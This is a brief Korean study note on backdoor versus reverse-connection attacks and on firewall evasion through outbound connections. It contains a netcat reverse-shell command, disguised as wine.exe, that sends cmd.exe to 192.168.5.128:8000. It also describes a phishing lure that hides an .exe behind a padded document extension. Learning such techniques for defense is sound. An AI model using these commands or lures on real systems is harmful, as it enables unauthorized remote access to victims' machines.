Backdoor & Reverse

Backdoor

미리 Victim의 관리자 PW등을 알아낸 후,

Victim host에 백도어를 실행하고 Attacker는 Victim host의 Backdoor에 접근해서 연결하는 방식

backdoor 공격 방법

연결 방법

• 공격자가 공격대상에 접근
• 미리 공격대상

 

문제점 : 방화벽이 존재하기 때문에 80(http), 443(https)과 같이 미리 열어둔 포트가 아니면 접속 불가

Reverse

방화벽의 특성을 역 이용(내부에서 외부로 가는 통신은 잘 잡지 않음)하여 RAT(Remote Access Trojan)을 이용해서 역으로 연결하는 방식

공격대상이 공격자 쪽으로 접근하는 방식

공격대상에 RAT을 침투시켜서 실행될 경우, 공격자가 미리 준비한 컴퓨터로 연결 시도(트로이 목마 방식)

방화벽을 우회할 수 있다는 장점이 있음

 

웹쉘, .bat을 이용하여 c:\wine.exe(RAT)  192.168.5.128  8000  -e cmd.exe와 같이 실행하게 함

사례)

• 항공권, 이력서, 초대장 등을 보내서 마우스 클릭을 유도 (ex) 이력서.hwp                                                              .exe)

reverse 공격 방법

대표적인 도구 Netcat : nc.exe, nc